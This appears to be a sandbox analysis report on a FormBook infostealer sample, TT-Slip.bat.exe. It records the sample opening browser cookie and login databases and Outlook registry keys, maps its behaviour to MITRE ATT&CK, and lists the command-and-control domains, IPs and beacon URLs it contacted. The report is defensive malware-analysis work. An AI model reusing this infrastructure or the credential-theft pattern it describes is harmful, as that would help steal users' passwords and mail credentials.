Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 9.2.TT-Slip.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.TT-Slip.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2375891117.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514397970.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4517126416.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514322449.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514041725.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2376998691.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4515341375.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\compact.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 9.2.TT-Slip.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.TT-Slip.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2375891117.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514397970.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4517126416.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514322449.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514041725.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2376998691.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4515341375.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TT-Slip.bat.exe	50%	ReversingLabs	Win32.Trojan.Generic
TT-Slip.bat.exe	40%	Virustotal		Browse
TT-Slip.bat.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	50%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
dns.ladipage.com	1%	Virustotal	Browse
www.lenovest.xyz	1%	Virustotal	Browse
shahaf3d.com	8%	Virustotal	Browse
futuregainers.net	8%	Virustotal	Browse
www.931951.com	8%	Virustotal	Browse
srripaspocon.org	7%	Virustotal	Browse
www.torentreprenad.com	10%	Virustotal	Browse
shopnow321.online	1%	Virustotal	Browse
www.shopnow321.online	3%	Virustotal	Browse
www.homeppower.com	2%	Virustotal	Browse
www.fr2e4o.cfd	0%	Virustotal	Browse
www.srripaspocon.org	11%	Virustotal	Browse
www.navigate-power.boats	11%	Virustotal	Browse
www.futuregainers.net	8%	Virustotal	Browse
www.x5hh186z.skin	0%	Virustotal	Browse
www.againbeautywhiteskin.asia	5%	Virustotal	Browse
www.shahaf3d.com	6%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://push.zhanzhang.baidu.com/push.js	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.litespeedtech.com/error-page	0%	URL Reputation	safe
https://zz.bdstatic.com/linksubmit/push.js	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://td.doubleclick.net	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.grecanici.com/4iea/?aN6=3TWTWTzxVTU&I2ID3h=LPPTutp79E4NI/FTL4slzgCz9Mw5fMldsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp4zucdPe+KsM3p1oNwK6FzAkB3R3BpNYPETyLQ+W6Q8ZNIg==	0%	Avira URL Cloud	safe
http://www.leadchanges.info/mjuo/?I2ID3h=GUK7oVIRF3FAoVisjIpZqa7HO+54FDT9CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWsnaQUI6Xonsfl1/2Pr0gDDe9u92eKgSNgaya45CSuU3/+xA==&aN6=3TWTWTzxVTU	0%	Avira URL Cloud	safe
https://optimize.google.com	0%	Avira URL Cloud	safe
https://optimize.google.com	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.	6%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.931951.com/2ha1/	100%	Avira URL Cloud	malware
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.	100%	Avira URL Cloud	malware
https://niteothemes.com	0%	Avira URL Cloud	safe
https://www.futuregainers.net/l4k7/?I2ID3h=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywY	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-72.png	0%	Avira URL Cloud	safe
http://www.shopnow321.online/41br/	0%	Avira URL Cloud	safe
https://shahaf3d.com/wp-admin/admin-ajax.php	100%	Avira URL Cloud	malware
http://www.93v0.com/hcaw/	100%	Avira URL Cloud	malware
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	0%	Avira URL Cloud	safe
http://www.torentreprenad.com/r45o/?I2ID3h=gzu5VRbRlKcxtienrOg/vYWmVRq4TNxrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2ulftPanOXvGI3UspsimcWApbI+/t5L5iOpVxhoCh3AVdsA==&aN6=3TWTWTzxVTU	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css	0%	Avira URL Cloud	safe
https://shahaf3d.com/wp-admin/admin-ajax.php	2%	Virustotal		Browse
https://static.loopia.se/responsive/images/iOS-72.png	0%	Virustotal		Browse
https://www.googleoptimize.com	0%	Avira URL Cloud	safe
http://www.klimkina.pro/4mpz/?I2ID3h=Y+s3rA3a2LtNoPwWBpgaIhZOwJKcGGwPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4VugnDmL18sFLFtZPCU1s7f3MGpNHQZhMMTSljGkpJqnZygw==&aN6=3TWTWTzxVTU	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Avira URL Cloud	safe
https://niteothemes.com	0%	Virustotal		Browse
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	0%	Avira URL Cloud	safe
https://youtu.be/uO1hXLmT2j4	0%	Avira URL Cloud	safe
https://www.googleoptimize.com	0%	Virustotal		Browse
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Virustotal		Browse
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css	0%	Virustotal		Browse
https://fburl.com	0%	Avira URL Cloud	safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	1%	Virustotal		Browse
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	1%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Avira URL Cloud	safe
https://youtu.be/uO1hXLmT2j4	0%	Virustotal		Browse
http://www.searchvity.com/?dn=	0%	Avira URL Cloud	safe
http://www.shahaf3d.com/0a9p/?aN6=3TWTWTzxVTU&I2ID3h=V8kIBUO99PR2h3hxIilGCb7xaYAlhXctAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SdTcO7d1UbA68KXQq7mwut3Hj5agfoSiSpP8q1JtrU0Uptw==	100%	Avira URL Cloud	malware
http://www.93v0.com/hcaw/?aN6=3TWTWTzxVTU&I2ID3h=Xa5/huFy8Eck4v8ee+xdjh1i7ba8Clp/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNuXrL2/4+zEPMpu7c25bMsodP4e1eE2n/p2tEGurmvoeYLA==	100%	Avira URL Cloud	malware
http://www.shopnow321.online/41br/	3%	Virustotal		Browse
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2	100%	Avira URL Cloud	malware
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Avira URL Cloud	safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	1%	Virustotal		Browse
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Virustotal		Browse
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Virustotal		Browse
https://fburl.com	0%	Virustotal		Browse
http://www.lenovest.xyz/e20q/	0%	Avira URL Cloud	safe
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css	100%	Avira URL Cloud	malware
https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg	100%	Avira URL Cloud	malware
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2	6%	Virustotal		Browse
http://www.searchvity.com/?dn=	3%	Virustotal		Browse
https://static.loopia.se/responsive/images/iOS-114.png	0%	Avira URL Cloud	safe
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css	2%	Virustotal		Browse
http://www.shopnow321.online/41br/?aN6=3TWTWTzxVTU&I2ID3h=65BU6tOk0p5LPOIIq5f29seWsrYdgC5c7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rYjy1JJSSd8gZV48OK5h4nt3TyfM9xWMZVLxRvlpiI2JcoA==	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Virustotal		Browse
https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg	6%	Virustotal		Browse
http://www.lenovest.xyz/e20q/?I2ID3h=WPritX3A9R+ySLDHKkvQUC0K3y08yWvw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRN4bGZF5mTK/2R7/0SECzHSrPiKfzVgxr4RzAam04Uo8fzA==&aN6=3TWTWTzxVTU	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-114.png	0%	Virustotal		Browse
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Virustotal		Browse
http://www.leadchanges.info/mjuo/	0%	Avira URL Cloud	safe
https://wordpress.org/plugins/cmp-coming-soon-maintenance/	0%	Avira URL Cloud	safe
https://www.googleanalytics.com	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://klimkina.pro/4mpz/?I2ID3h=Y	0%	Avira URL Cloud	safe
http://www.shahaf3d.com/0a9p/	100%	Avira URL Cloud	malware
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/styles/reset.css	0%	Avira URL Cloud	safe
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	1%	Virustotal		Browse
http://www.againbeautywhiteskin.asia/3h10/?I2ID3h=9mZLXJL8GvO5ODxbtOpJ+rtZ6f1lqm3xC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtBRN5P/YRXsr4vMZ6FVLxfHeIGNVk4/Pc6j/1s70JI4NHtA==&aN6=3TWTWTzxVTU	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-57.png	0%	Avira URL Cloud	safe
http://www.srripaspocon.org/egr4/	0%	Avira URL Cloud	safe
http://www.klimkina.pro/4mpz/	0%	Avira URL Cloud	safe
https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693	0%	Avira URL Cloud	safe
http://www.searchvity.com/	0%	Avira URL Cloud	safe
https://www.hostgator.com.br	0%	Avira URL Cloud	safe
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://shahaf3d.com	100%	Avira URL Cloud	malware
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.grecanici.com/4iea/	0%	Avira URL Cloud	safe
https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693	0%	Avira URL Cloud	safe
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	0%	Avira URL Cloud	safe
http://www.torentreprenad.com/r45o/	0%	Avira URL Cloud	safe
http://www.leadchanges.info	0%	Avira URL Cloud	safe
http://www.futuregainers.net/l4k7/?I2ID3h=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+Wm9/sLy/+6kwKxmizhSXMLRmEd0k89wM5PzrnuS1OcOQUw==&aN6=3TWTWTzxVTU	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.klimkina.pro	185.137.235.125	true	true		unknown
dns.ladipage.com	54.179.173.60	true	true	1%, Virustotal, Browse	unknown
www.lenovest.xyz	162.0.213.94	true	true	1%, Virustotal, Browse	unknown
shahaf3d.com	64.46.118.35	true	true	8%, Virustotal, Browse	unknown
futuregainers.net	195.35.39.119	true	true	8%, Virustotal, Browse	unknown
www.931951.com	172.82.177.221	true	true	8%, Virustotal, Browse	unknown
www.93v0.com	18.178.206.118	true	true		unknown
srripaspocon.org	15.204.0.108	true	true	7%, Virustotal, Browse	unknown
www.grecanici.com	35.214.235.206	true	true		unknown
www.torentreprenad.com	194.9.94.86	true	true	10%, Virustotal, Browse	unknown
shopnow321.online	162.241.2.254	true	true	1%, Virustotal, Browse	unknown
www.leadchanges.info	66.96.162.149	true	true		unknown
www.fr2e4o.cfd	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.shopnow321.online	unknown	unknown	true	3%, Virustotal, Browse	unknown
www.homeppower.com	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.x5hh186z.skin	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.srripaspocon.org	unknown	unknown	true	11%, Virustotal, Browse	unknown
www.shahaf3d.com	unknown	unknown	true	6%, Virustotal, Browse	unknown
www.againbeautywhiteskin.asia	unknown	unknown	true	5%, Virustotal, Browse	unknown
www.futuregainers.net	unknown	unknown	true	8%, Virustotal, Browse	unknown
www.navigate-power.boats	unknown	unknown	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.grecanici.com/4iea/?aN6=3TWTWTzxVTU&I2ID3h=LPPTutp79E4NI/FTL4slzgCz9Mw5fMldsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp4zucdPe+KsM3p1oNwK6FzAkB3R3BpNYPETyLQ+W6Q8ZNIg==	true	Avira URL Cloud: safe	unknown
http://www.leadchanges.info/mjuo/?I2ID3h=GUK7oVIRF3FAoVisjIpZqa7HO+54FDT9CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWsnaQUI6Xonsfl1/2Pr0gDDe9u92eKgSNgaya45CSuU3/+xA==&aN6=3TWTWTzxVTU	true	Avira URL Cloud: safe	unknown
http://www.931951.com/2ha1/	true	Avira URL Cloud: malware	unknown
http://www.shopnow321.online/41br/	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.93v0.com/hcaw/	true	Avira URL Cloud: malware	unknown
http://www.torentreprenad.com/r45o/?I2ID3h=gzu5VRbRlKcxtienrOg/vYWmVRq4TNxrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2ulftPanOXvGI3UspsimcWApbI+/t5L5iOpVxhoCh3AVdsA==&aN6=3TWTWTzxVTU	true	Avira URL Cloud: safe	unknown
http://www.klimkina.pro/4mpz/?I2ID3h=Y+s3rA3a2LtNoPwWBpgaIhZOwJKcGGwPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4VugnDmL18sFLFtZPCU1s7f3MGpNHQZhMMTSljGkpJqnZygw==&aN6=3TWTWTzxVTU	true	Avira URL Cloud: safe	unknown
http://www.shahaf3d.com/0a9p/?aN6=3TWTWTzxVTU&I2ID3h=V8kIBUO99PR2h3hxIilGCb7xaYAlhXctAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SdTcO7d1UbA68KXQq7mwut3Hj5agfoSiSpP8q1JtrU0Uptw==	true	Avira URL Cloud: malware	unknown
http://www.93v0.com/hcaw/?aN6=3TWTWTzxVTU&I2ID3h=Xa5/huFy8Eck4v8ee+xdjh1i7ba8Clp/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNuXrL2/4+zEPMpu7c25bMsodP4e1eE2n/p2tEGurmvoeYLA==	true	Avira URL Cloud: malware	unknown
http://www.lenovest.xyz/e20q/	true	Avira URL Cloud: safe	unknown
http://www.shopnow321.online/41br/?aN6=3TWTWTzxVTU&I2ID3h=65BU6tOk0p5LPOIIq5f29seWsrYdgC5c7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rYjy1JJSSd8gZV48OK5h4nt3TyfM9xWMZVLxRvlpiI2JcoA==	true	Avira URL Cloud: safe	unknown
http://www.lenovest.xyz/e20q/?I2ID3h=WPritX3A9R+ySLDHKkvQUC0K3y08yWvw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRN4bGZF5mTK/2R7/0SECzHSrPiKfzVgxr4RzAam04Uo8fzA==&aN6=3TWTWTzxVTU	true	Avira URL Cloud: safe	unknown
http://www.leadchanges.info/mjuo/	true	Avira URL Cloud: safe	unknown
http://www.shahaf3d.com/0a9p/	true	Avira URL Cloud: malware	unknown
http://www.againbeautywhiteskin.asia/3h10/?I2ID3h=9mZLXJL8GvO5ODxbtOpJ+rtZ6f1lqm3xC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtBRN5P/YRXsr4vMZ6FVLxfHeIGNVk4/Pc6j/1s70JI4NHtA==&aN6=3TWTWTzxVTU	true	Avira URL Cloud: safe	unknown
http://www.srripaspocon.org/egr4/	true	Avira URL Cloud: safe	unknown
http://www.klimkina.pro/4mpz/	true	Avira URL Cloud: safe	unknown
http://www.grecanici.com/4iea/	true	Avira URL Cloud: safe	unknown
http://www.torentreprenad.com/r45o/	true	Avira URL Cloud: safe	unknown
http://www.futuregainers.net/l4k7/?I2ID3h=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+Wm9/sLy/+6kwKxmizhSXMLRmEd0k89wM5PzrnuS1OcOQUw==&aN6=3TWTWTzxVTU	true	Avira URL Cloud: safe	unknown
http://www.againbeautywhiteskin.asia/3h10/	true	Avira URL Cloud: safe	unknown
http://www.931951.com/2ha1/?aN6=3TWTWTzxVTU&I2ID3h=r6q+x3A/FEQLw6gmNICl4m79J6xGYnb4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2MGDyrphp7y0SUfwCG55tOna8TREqvQmgePUorTaqhIxnZg==	true	Avira URL Cloud: malware	unknown
http://www.srripaspocon.org/egr4/?I2ID3h=OombhWzhkCuNqFAQBgJWCTIe5Ku7zRL7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qCyQrh5sl2ntzzWgXRuNaMR0672puaeGZqUZ0nGfY4wTYgtA==&aN6=3TWTWTzxVTU	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://optimize.google.com	compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.	compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.futuregainers.net/l4k7/?I2ID3h=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywY	compact.exe, 00000011.00000002.4516014437.0000000003D36000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003276000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2708902646.0000000007526000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://niteothemes.com	compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
